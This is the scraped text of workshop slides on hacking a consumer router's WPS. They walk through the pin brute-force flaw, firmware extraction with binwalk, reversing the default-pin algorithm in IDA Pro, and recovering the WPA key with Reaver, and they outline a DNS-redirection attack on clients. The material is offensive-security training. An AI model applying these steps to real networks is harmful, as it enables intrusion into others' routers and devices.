i. Log into web management interface (Preview of next session) Connect to router with WPA key We’ll figure out how to gain admin access in Session II
Lab 3: Q&A  What’s the difference between monitor mode and promiscuous mode?  Promiscuous mode allows packets to be sniffed only on the AP the wifi adapter is currently connected to  Monitor mode allows all packets on a particular channel to be sniffed if packets are in listening range  Are there any other interesting wifi modes?  Master mode, which allows the wifi adapter to behave as an access point  TheTP Link adapter also supports this mode 
References  [1]WPSVulnerability, University ofAlabama, Huntsville
Recap Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password
Recap Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 1
Recap Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 2
Recap Overall goal was to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 3
 Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 174 Recap Pwned Session I
Conclusion  In this session, we were able to obtain initial remote access to the target device  The next step is to elevate our privileges on the target to that of an adminsitrator.  This device uses client side authentication for admin privileges, which we will exploit in Session II  Session III will be focused on utilizing admin privileges from Session II to compromise aWindows 7 device connected to the Belkin router

More Related Content

PDF
Offensive cyber security: Smashing the stack with Python
Malachi Jones
 
PDF
Automating Analysis and Exploitation of Embedded Device Firmware
Malachi Jones
 
PDF
SmartphoneHacking_Android_Exploitation
Malachi Jones
 
PDF
Automated In-memory Malware/Rootkit Detection via Binary Analysis and Machin...
Malachi Jones
 
PDF
Over-the-Air: How we Remotely Compromised the Gateway, BCM, and Autopilot ECU...
Priyanka Aash
 
PPT
B-Sides Seattle 2012 Offensive Defense
Stephan Chenette
 
PPTX
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TechSecIT
 
PPT
The Future of Automated Malware Generation
Stephan Chenette
 
Offensive cyber security: Smashing the stack with Python
Malachi Jones
 
Automating Analysis and Exploitation of Embedded Device Firmware
Malachi Jones
 
SmartphoneHacking_Android_Exploitation
Malachi Jones
 
Automated In-memory Malware/Rootkit Detection via Binary Analysis and Machin...
Malachi Jones
 
Over-the-Air: How we Remotely Compromised the Gateway, BCM, and Autopilot ECU...
Priyanka Aash
 
B-Sides Seattle 2012 Offensive Defense
Stephan Chenette
 
An Introduction of SQL Injection, Buffer Overflow & Wireless Attack
TechSecIT
 
The Future of Automated Malware Generation
Stephan Chenette
 

What's hot (20)

PPTX
Man in the NFC by Haoqi Shan and Qing Yang
CODE BLUE
 
PDF
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
CODE BLUE
 
PDF
Protocol T50: Five months later... So what?
Nelson Brito
 
PDF
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 
PDF
Possibility of arbitrary code execution by Step-Oriented Programming
kozossakai
 
PDF
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
Priyanka Aash
 
PDF
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat Security Conference
 
PDF
Automatic tool for static analysis
Chong-Kuan Chen
 
PPTX
Buffer overflow attacks
Joe McCarthy
 
PDF
.NET for hackers
Antonio Parata
 
PDF
[PH-Neutral 0x7db] Exploit Next Generation®
Nelson Brito
 
PDF
IoT Malware: Comprehensive Survey, Analysis Framework and Case Studies
Priyanka Aash
 
PPTX
Buffer overflow attacks
Kapil Nagrale
 
PPTX
Buffer overflow attacks
Japneet Singh
 
PPTX
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
PPTX
How Safe is your Link ?
Peter Hlavaty
 
PDF
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
PPT
Software security
Roman Oliynykov
 
PPTX
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
CODE BLUE
 
PDF
[CLASS 2014] Palestra Técnica - Jonathan Knudsen
TI Safe
 
Man in the NFC by Haoqi Shan and Qing Yang
CODE BLUE
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
CODE BLUE
 
Protocol T50: Five months later... So what?
Nelson Brito
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Chong-Kuan Chen
 
Possibility of arbitrary code execution by Step-Oriented Programming
kozossakai
 
From Thousands of Hours to a Couple of Minutes: Automating Exploit Generation...
Priyanka Aash
 
BlueHat v18 || Protecting the protector, hardening machine learning defenses ...
BlueHat Security Conference
 
Automatic tool for static analysis
Chong-Kuan Chen
 
Buffer overflow attacks
Joe McCarthy
 
.NET for hackers
Antonio Parata
 
[PH-Neutral 0x7db] Exploit Next Generation®
Nelson Brito
 
IoT Malware: Comprehensive Survey, Analysis Framework and Case Studies
Priyanka Aash
 
Buffer overflow attacks
Kapil Nagrale
 
Buffer overflow attacks
Japneet Singh
 
Hunting for APT in network logs workshop presentation
OlehLevytskyi1
 
How Safe is your Link ?
Peter Hlavaty
 
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
Software security
Roman Oliynykov
 
Revealing the Attack Operations Targeting Japan by Shusei Tomonaga & Yuu Nak...
CODE BLUE
 
[CLASS 2014] Palestra Técnica - Jonathan Knudsen
TI Safe
 

Viewers also liked (20)

PPTX
EMBEDDED WEB SERVER
kavya Reddy
 
PDF
Top Ten Web Hacking Techniques (2008)
Jeremiah Grossman
 
PPTX
Introduction To Ethical Hacking
Neel Kamal
 
PDF
The Soul in The Machine - Developing for Humans
Christian Heilmann
 
PDF
Hype vs. Reality: The AI Explainer
Luminary Labs
 
PPT
Acronis
anandchakru
 
PPTX
Lesson2
Alex Honcharuk
 
PPTX
Mark rothko daugavpils 8
Rudybobudy
 
PPTX
Konkurss -jvg11b 7
Rudybobudy
 
PDF
Αναφορά Ν. Μηταράκη σχετικά με τον ελάχιστο αριθμό μαθητών και τη μοριοδότηση...
Notis Mitarachi
 
PPTX
Laptops guidelines and items to consider
jenblack4
 
ODP
Skrillex biography
Nuria Tuda
 
PPTX
Alexander Cappelen
Stormkast
 
PDF
Tina Stiegler
Stormkast
 
PDF
Gerry McGovern Transform
Stormkast
 
DOCX
Sada shiva profile
Sada Shiva Prasad
 
PPTX
Pwning Iot via Hardware Attacks - Chase Schultz - IoT Village - Defcon 23
Chase Schultz
 
PDF
Aurelius Wachstumskapital Company Presentation
Matthias Schneck
 
PPTX
Advanced SOHO Router Exploitation XCON
Lyon Yang
 
PPTX
Various popular methods for coal belt treatment
JNB Laboratories
 
EMBEDDED WEB SERVER
kavya Reddy
 
Top Ten Web Hacking Techniques (2008)
Jeremiah Grossman
 
Introduction To Ethical Hacking
Neel Kamal
 
The Soul in The Machine - Developing for Humans
Christian Heilmann
 
Hype vs. Reality: The AI Explainer
Luminary Labs
 
Acronis
anandchakru
 
Lesson2
Alex Honcharuk
 
Mark rothko daugavpils 8
Rudybobudy
 
Konkurss -jvg11b 7
Rudybobudy
 
Αναφορά Ν. Μηταράκη σχετικά με τον ελάχιστο αριθμό μαθητών και τη μοριοδότηση...
Notis Mitarachi
 
Laptops guidelines and items to consider
jenblack4
 
Skrillex biography
Nuria Tuda
 
Alexander Cappelen
Stormkast
 
Tina Stiegler
Stormkast
 
Gerry McGovern Transform
Stormkast
 
Sada shiva profile
Sada Shiva Prasad
 
Pwning Iot via Hardware Attacks - Chase Schultz - IoT Village - Defcon 23
Chase Schultz
 
Aurelius Wachstumskapital Company Presentation
Matthias Schneck
 
Advanced SOHO Router Exploitation XCON
Lyon Yang
 
Various popular methods for coal belt treatment
JNB Laboratories
 

Similar to Embedded device hacking Session i (20)

PPT
Attacking Embedded Devices (No Axe Required)
Security Weekly
 
PPTX
DevLink - WiFu: You think your wireless is secure?
Rob Gillen
 
PDF
0day hunting a.k.a. The story of a proper CPE test
Balazs Bucsay
 
PDF
0Day Hunting A.K.A. The Story of a Proper CPE Test by Balazs Bacsay
Shakacon
 
PDF
International Conference On Electrical and Electronics Engineering
anchalsinghdm
 
PDF
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam tests
📡 Sebastien Dudek
 
PPTX
Exploiting WiFi Security
Hariraj Rathod
 
PPT
Wifi Cracking - Step by Step Using Backtracks Tool
John Henry Gaspay
 
ODP
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
PPTX
Teensy Programming for Everyone
Nikhil Mittal
 
PDF
Ntxissacsc5 red 1 &amp; 2 basic hacking tools ncc group
North Texas Chapter of the ISSA
 
PPTX
Wireless_Penetration_Testing_Detailed.pptx
cybertrainings2020
 
PPTX
Wireless Security null seminar
Nilesh Sapariya
 
PDF
Pentesting Wireless Networks and Wireless Network Security
Ayoma Wijethunga
 
PDF
Wireless Network Security Software Wireless Network Security Software
BRNSSPublicationHubI
 
PPT
WiFi practical hacking "Show me the passwords!"
DefCamp
 
PDF
Hack Attack! An Introduction to Penetration Testing
Steve Phillips
 
PPTX
You think your WiFi is safe?
Rob Gillen
 
PDF
Penetration Testing is the Art of the Manipulation
JongWon Kim
 
PPTX
UPC router reverse engineering - case study
Dusan Klinec
 
Attacking Embedded Devices (No Axe Required)
Security Weekly
 
DevLink - WiFu: You think your wireless is secure?
Rob Gillen
 
0day hunting a.k.a. The story of a proper CPE test
Balazs Bucsay
 
0Day Hunting A.K.A. The Story of a Proper CPE Test by Balazs Bacsay
Shakacon
 
International Conference On Electrical and Electronics Engineering
anchalsinghdm
 
Security PWNing 2018 - Penthertz: The use of radio attacks during redteam tests
📡 Sebastien Dudek
 
Exploiting WiFi Security
Hariraj Rathod
 
Wifi Cracking - Step by Step Using Backtracks Tool
John Henry Gaspay
 
Cracking Into Embedded Devices - HACK.LU 2K8
guest441c58b71
 
Teensy Programming for Everyone
Nikhil Mittal
 
Ntxissacsc5 red 1 &amp; 2 basic hacking tools ncc group
North Texas Chapter of the ISSA
 
Wireless_Penetration_Testing_Detailed.pptx
cybertrainings2020
 
Wireless Security null seminar
Nilesh Sapariya
 
Pentesting Wireless Networks and Wireless Network Security
Ayoma Wijethunga
 
Wireless Network Security Software Wireless Network Security Software
BRNSSPublicationHubI
 
WiFi practical hacking "Show me the passwords!"
DefCamp
 
Hack Attack! An Introduction to Penetration Testing
Steve Phillips
 
You think your WiFi is safe?
Rob Gillen
 
Penetration Testing is the Art of the Manipulation
JongWon Kim
 
UPC router reverse engineering - case study
Dusan Klinec
 

Recently uploaded (20)

PDF
Approach and Philosophy of On baking technology
30anthuong17
 
PDF
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
PDF
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
PDF
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
PDF
KodekX | Application Modernization Development
KodekX
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
PPTX
Spectroscopy.pptx food analysis technology
nawahassan45
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
Approach and Philosophy of On baking technology
30anthuong17
 
Electronic commerce courselecture one. Pdf
OmerMohamed64
 
Review of recent advances in non-invasive hemoglobin estimation
IAESIJAI
 
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
20250228 LYD VKU AI Blended-Learning.pptx
DatVoNgoc
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
“AI and Expert System Decision Support & Business Intelligence Systems”
ZubinRadhakrishnan
 
7 ChatGPT Prompts to Help You Define Your Ideal Customer Profile.pdf
SOFTTECHHUB
 
KodekX | Application Modernization Development
KodekX
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Dropbox Q2 2025 Financial Results & Investor Presentation
Dropbox
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
Spectroscopy.pptx food analysis technology
nawahassan45
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 

Embedded device hacking Session i

  • 1. Embedded Device Hacking Session I: Obtaining Initial Remote Access By: Malachi Jones, PhD
  • 2. About Me  Education  Bachelors Degree: Computer Engineering (Univ. of Florida, 2007)  Master’s Degree: Computer Engineering (GeorgiaTech, 2009)  PhD: Computer Engineering (GeorgiaTech, 2013)  Cyber Security Experience  Harris: Cyber Software Engineer (2013-2014)  Harris: Vulnerability Researcher (2015)  BoozAllen DarkLabs : Embedded Security Researcher (2016- Present) https://www.linkedin.com/in/malachijonesphd
  • 3. About Dark Labs BoozAllen Dark Labs is an elite team of security researchers, penetration testers, reverse engineers, network analysts, and data scientists, dedicated to stopping cyber attacks before they occur.1 (1 http://darklabs.bah.com)
  • 4. I. Motivation: Ubiquity of embedded devices II. Objectives ofWorkshop III. WorkshopOverview IV. TheWorkshop: Hacking a consumer router  Session I: Obtaining Initial Remote Access  Session II: Exploitation  Session III: pwnage V. Conclusion Outline
  • 5. Motivation  Ubiquity of Embedded Devices Critical Infrastructure (Nuclear Power Plant) Life Critical Systems (Pace Maker) Financial Infrastructure (Banking & Investing) Internet ofThings (IoT) (IoT Gadgets) Commercial Products (Network Switch) Transportation Systems (Jeep)
  • 6. 2015: AYear of Embedded Exploitation (Link)
  • 8. ????? 2017: Its Just Getting Started
  • 9. Objectives of Workshop  Explore practical applications of reverse engineering  Discuss concepts/techniques that hackers utilize to uncover vulns in real-world embedded devices.  Provide a hands-on introduction to key pen-testing tools
  • 10. Workshop Overview Want to understand the process of hacking/ pentesting a sophisticated embedded system such as a car?
  • 11. Workshop Overview  A first step is to first learn how to hack a consumer router  Why?  Its cheaper, so if you make a mistake and brick it, you won’t be out of +60k  Although a simpler system and easier target, the core pentesting principles and processes are similar
  • 12. Workshop Overview  We’ll focus on a Belkin router (F5D7234-4 version 5)  Its pretty cheap (<$20) and is a pretty soft target that is suitable for individuals new to embedded hacking
  • 13. Workshop Overview Overall Hacking Objective: Compromise an initial target (e.g wifi router) and then use that target as leverage to compromise other targets
  • 14. Workshop Overview Steps to Achieve Hacking Objective: 1) Obtain Initial remote access to the device  Wifi Router Context: This means the ability to connect to its network, which often requires knowledge of the wpa password
  • 15. Workshop Overview Steps to Achieve Hacking Objective: 2) Escalate privileges on device to admin/root  Wifi Router Context: Administrative privileges can allow us to control/manipulate the IP traffic of clients connected to device
  • 16. Workshop Overview Steps to Achieve Hacking Objective: 3) Exploit privileges to compromise other devices  Wifi Router Context: Send clients malicious IP traffic that allows us to compromise them also
  • 17.  Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 17 WorkshopOverview Pwned
  • 18. WorkshopOverview  The workshop will be organized into three sessions that capture the pen-testing phases of going from discovery to p0wnage  Session I: Discovery of a vulnerability in theWPS implementation to obtain initial access on device  Session II: Exploring weaknesses in the web management interface to gain administrative access  Session III: Development of a proof of concept that demonstrates how aWindows 7 user can be p0wned via web browser with a maliciously configured router
  • 19.  Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 19 WorkshopOverview Pwned Session I
  • 20.  Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 20 WorkshopOverview Pwned Session II
  • 21.  Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 21 WorkshopOverview Pwned Session III
  • 22. The Workshop Hacking a Consumer Router
  • 23. TheWorkshop Session I: Obtaining Initial Remote Access to the Device
  • 24. Session I: Outline I. Overview II. Background III. Required Material IV. Lab 1: Firmware Data Extraction with Binwalk V. Lab 2: Reversing/Bug Hunting with IDA Pro VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
  • 25. Session I: Overview (tldr)  WPS pin method is on by default on virtually all consumer routers  Design flaw inWPS allows pin to be brute forced in under 11000 attempts  Once aWPS pin is known, a tool such as Reaver can be utilized to retrieve the WPA key instantaneously (see next slide)  On some routers (including F5D7234-4), the default pin can be computed by reverse engineering the pin generation algorithm
  • 26. Session I:The Big Picture Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password
  • 27. Session I:The Big Picture Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 1
  • 28. Session I:The Big Picture Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 2
  • 29. Session I:The Big Picture Overall goal is to figure out what the router’s WPA password so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 3
  • 30. End Result: Gain Access to Management Interface Session I: The Big Picture
  • 31.  Router Exploitation Example (via Redirection Attack)  Step 1: Hacker gains remote access to router  Step 2: Elevates privileges to admin  Step 3: Changes DNS settings on router  Step 4: Router now talks to hacker’s server to resolve name address  Step 5: www.cnn.com now resolves to an IP address of hacker’s server  Step 6: Hacker provides malicious traffic to devices on the network  Step 7: 31 Session I:The Big Picture Pwned Session I
  • 32. Session I: Outline I. Overview II. Background III. Required Material IV. Lab 1: Firmware Data Extraction with Binwalk V. Lab 2: Reversing/Bug Hunting with IDA Pro VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
  • 33. Session I: Background 1. WPS Design Flaw Explained 2. Exploiting Belkin’s PIN Generation Algorithm 3. IDA Pro
  • 34. Background:WPS Explained  Wi-Fi Protected Setup (WPS) was created byWi-Fi Alliance in 2006  Goal to make it easy for home users to add new devices securely to network w/o entering long passphrases  One of the modes allowed for user to enter the router’s 8 digit pin to connect a desired device to network
  • 35. Background:WPS Explained  Design Flaw Explained  WPS has an 8 digit pin numeric pin (0-9)  Number of attempts to bruteforce an 8 digit pin 1 2 3 4 5 6 7 8 108 = 100 million
  • 36. Background:WPS Explained  Design Flaw Explained  The 8th digit pin is a checksum  Number of attempts to bruteforce a 7 digit pin 1 2 3 4 5 6 7 8 107 = 10 million
  • 37. Background:WPS Explained  Design Flaw Explained  Pin split into two groups and a Nack/ack is sent that indicates if the pin for that group is correct  Number of attempts to bruteforce a 7 digit pin split into groups( 4+ 3) 1 2 3 4 5 6 7 8 104 + 103= 11000 Nack/ Ack Nack/ Ack
  • 38.  We could exploit this design flaw for the Belkin router that we are targeting to obtain pin  However, there is aWPS implementation flaw, specific to this router, that allows us to get the pin in 1 try vs 11,000 Background:WPS Explained
  • 39. Background: Belkin Pin Generation Exploit  Pin generation exploit material presented in this workshop is based on the write-up by Craig @ www.devttys0.com  /DEV/TTYS0 provides excellent material on embedded hacking in general and router hacking in particular
  • 40. Background: Belkin Pin Generation Exploit  BelkinWPS Pin Algorithm  Note: Serial ID and WLAN MAC can be obtained by sniffing certain packets that are broadcast by the router PinGeneration Algorithm 12345678 Serial ID WLAN MAC
  • 41. Background: IDA Pro  De facto tool for disassembling, decompiling, and debugging binaries  Supports a wide array of processor architectures that include the following:  MIPS  ARM  X86/x64
  • 42.  Code Flow of Routine (sub_43A53C) Background: IDA Pro Features
  • 43. Code Flow of Routine (sub_43A53C) For loop Loop back Here nch taken to ectively exit ction if referenced ue is ‘0’
  • 44. Background: IDA Pro Features  IDA Scripting support  Supports python scripting, which is known as IDAPython  Provides a power way to add extensive utilities and features to python  Also has a native language, IDC, which is a “C-like” language
  • 45.  Decompiling with Hex-Rays (x86,x64, andARM) Background: IDA Pro Features
  • 47.  For more information on IDA, there is a pretty awesome book written by Chris Eagle Background: IDA Pro Features
  • 48.  Professional Edition : $1500  Pro + Hex-rays decompiler (x86/x64 + ARM): $5500  Freeware version (link)  Very old edition w/o newer features including IDAPython  only x86 disassembler support  Still a good starting point Background: Acquiring IDA Pro
  • 49.  Binary Ninja (link)  License: $99.00 (Personal License)  Up and coming legitimate alternative/competitor to IDA Pro  Supports x86/x64 , ARM, and MIPS  Decompiler support  OS Platforms:Windows, OSX , and Linux Background: IDA Pro Alternatives
  • 50. Background: IDA Pro Alternatives Binary Ninja Screenshot
  • 51. I. Overview II. Background III. Required Material IV. Lab 1: Firmware Data Extraction with Binwalk V. Lab 2: Reversing/Bug Hunting with IDA Pro VI. Lab 3: Obtain Initial Access with Wireshark & Reaver Session I: Outline
  • 52. Required Material  Software  Kali LinuxVM 1.X  IDA Pro  Vmware/VirtualBox  Hardware  Belkin F5D7234-4 version 5  Wifi adapter w/ monitor mode (e.g.TP-LINKTL-WN722N)
  • 54. I. Overview II. Background III. Required Material IV. Big Picture V. Lab 1: Firmware Data Extraction VI. Lab 2: Reversing/Bug Hunting with IDA Pro VII. Lab 3: Obtain Initial Access with Wireshark & Reaver Session I: Outline
  • 55. Lab 1: Firmware Data Extraction & Analysis Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 1
  • 56. Lab 1: Firmware Data Extraction & Analysis  Steps for Extraction & Analysis 1. Install squashfs-tools if not installed 2. Perform initial analysis of firmware w/ Binwalk 3. Extract firmware data 4. Explore the squash file system folder
  • 57. Extraction and Analysis (Steps) 1) Install squashfs-tools if not installed (Next Slide)
  • 58. Install squashfs-tools if not installed $ sudo apt-get install squashfs-tools
  • 59. Extraction and Analysis (Steps) 2) Let binwalk do an initial analysis of firmware (Next Slide)
  • 60. Initial analysis with Binwalk $ sudo binwalk DIR810LB1_FW203B02.bin payload);
  • 61. 3) Extract firmware data (Next Slide) Extraction and Analysis (Steps)
  • 62. Extract Firmware Data $ sudo binwalk –e DIR810LB1_FW203B02.bin
  • 63. 4) Explore files in the squash file system folder (Next Slides) Extraction and Analysis (Steps)
  • 64. Explore squash filesystem ls –l /$absolute-path-to-squash-folder
  • 65. Explore squash filesystem ls –l /$absolute-path-to-squash-folder/sbin Contains theWPS pin generation logic
  • 66. Lab 1: Q&A  Why are we using Dlink firmware instead of Belkin?  Dlink has symbols (e.g. function names) which makes it easier to follow for those newer to reversing  Stripped firmware (i.e. no symbols) can be very difficult and take a substantial amount of time to reverse  Pin generation algorithm is conceptually similar between the Dlink and Belkin routers  What is a technique that can be used to help reverse engineer stripped binaries?  Make use of the debug strings found in binary to build intuition about what a routine is doing
  • 67. Lab 1: Q&A  How did we know theWPS pin generation logic could be found at the following location: /sbin/ncc?  Can create an IDAPython script that iterates through the binaries in the filesystem to search for specific symbols and strings  Strings and symbols of interest could contain “WPS”, “WPS Pin”, “Pin generation” , etc….  How can the firmware be acquired?  [Easy] Manufacturer’s website  [Difficult] Manual extraction from the device via JTAG or the serial port (see next 2 slide)  Note: Forge Hackerspace has a workshop on manual firmware extraction !!
  • 68. LinksysWRT120N PCB (Serial Port) Serial Port
  • 69. LinksysWRT120N PCB (Serial Port) Serial Port
  • 70.  Additional Resources  Reverse Engineering Firmware: http://www.devttys0.com/2011/05/reverse- engineering-firmware-linksys-wag120n/ Lab 1: Firmware Data Extraction
  • 71. I. Overview II. Background III. Required Material IV. Lab 1: Firmware Data Extraction with Binwalk V. Lab 2: Reversing with IDA Pro VI. Lab 3: Obtain Initial Access with Wireshark & Reaver Session I: Outline
  • 72. Lab 2: Reversing with IDA Pro Overall goal is to figure out what the router’s WPA password is so that we can gain initial access to router and the connected clients Reverse engineer algorithm Extract Firmware to find pin algorithm Obtain inputs to algorithm by sniffing traffic Generate pin and use reaver to get password Lab 2
  • 73.  Description  In this lab, we will take a look at the binary ncc, located in /sbin of the squash filesystem  Since ncc has quite a bit ofWPS logic, which includes the pin generation algorithm, we’ll do some exploring  We’ll walk through the process of locating a code segment of interest (wps algorithm) and illustrate the process of reversing the segment into C code Lab 2: Reversing with IDA Pro
  • 74.  Steps for Bug Hunting and Reversing 1. Load the binary ncc into IDA Pro for analysis 2. Hunt for the pin generation algorithm 3. Analyze the inputs of the algorithm 4. Reverse algorithm segment into C code Lab 2: Reversing with IDA Pro
  • 75. 1) Load the binary ncc into IDA Pro for analysis (Next Slide) Lab 2: Reversing with IDA Pro (Steps)
  • 76. Load the binary ncc into IDA Pro 1a. Launch IDA Pro
  • 77. Load the binary ncc into IDA Pro 1b. Click “New”
  • 78. Load the binary ncc into IDA Pro 1c. Drag ncc binary into IDA ncc binary IDA detects that binary is a MIPS ELF
  • 79. Load the binary ncc into IDA Pro 1d. Click “ok”
  • 80. Load the binary ncc into IDA Pro 1e. Wait for IDA to finish analyzing the binary
  • 81. Load the binary ncc into IDA Pro 1f. IDA indicates auto analysis has been finished Auto analysis complete
  • 82. 2) Hunt for the pin generation algorithm (Next Slide) Reversing with IDA Pro (Steps)
  • 83. Hunt for the pin generation algorithm 1a. See if you can find the pin generation routine
  • 84. Hunt for the pin generation algorithm a. (Hint:What happens when I search for “router” in the Function Window) Note: Ctrl+F brings up search box Term “router” entered into the function name filter
  • 85. a. (Hint:What happens when I search for “router” in the Function Window) Hunt for the pin generation algorithm Term “router” entered into the function name filter
  • 86. a. (Hint:Try some search terms relevant to the algorithm we’re trying to find) Try your own search terms??? Hunt for the pin generation algorithm
  • 87. a. (Try a few more keywords before you go to the next slide!!!) Try your own search terms ??? Hunt for the pin generation algorithm
  • 88. Hunt for the pin generation algorithm b. Let’s try the keyword “default” and see what we get This looks interesting
  • 89. Hunt for the pin generation algorithm c. Double click on “get_default_pin”
  • 90. Hunt for the pin generation algorithm c. (Continued…)
  • 91. 3)Analyzing the pin algorithm in subroutine get_default_pin (Next Slide) Lab 2: Reversing with IDA Pro (Steps)
  • 92. Analyze pin generation algorithm a. Lets examine possible input sources to algorithm
  • 93. Analyze pin generation algorithm a. Lets examine possible input sources to algorithm A call is made to a sub-routine that appears to get some information Subset of data from lockAndGetInfo_log will be formatted as follows: “%c:%:c%:c%….”
  • 94.  Any guesses on what “%c:%c…” might be? Hunt for the pin generation algorithm b. Lets take a closer look at the sprintf call Decompiling by hand to pseudo C char buffer [….]; char * data =lockAndGetInfo_log->interesting_data_element …………………………………… sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
  • 95.  Hints  Its 12 characters with a “:” in between each pair of 2 characters  This is a networking device  What is something (e.g. identifier) that each networking devices typically has that would be a good seed for a pin generation algorithm? Hunt for the pin generation algorithm c. Figure out what type of data could “%c%c…:%c%c” represent char buffer [….]; char * data =lockAndGetInfo_log->interesting_data_element …………………………………… sprintf (buffer, “%c%c:%c%c:%c%c:%c%c:%c%c:%c%c”, data[0], data[1],…,data[11]);
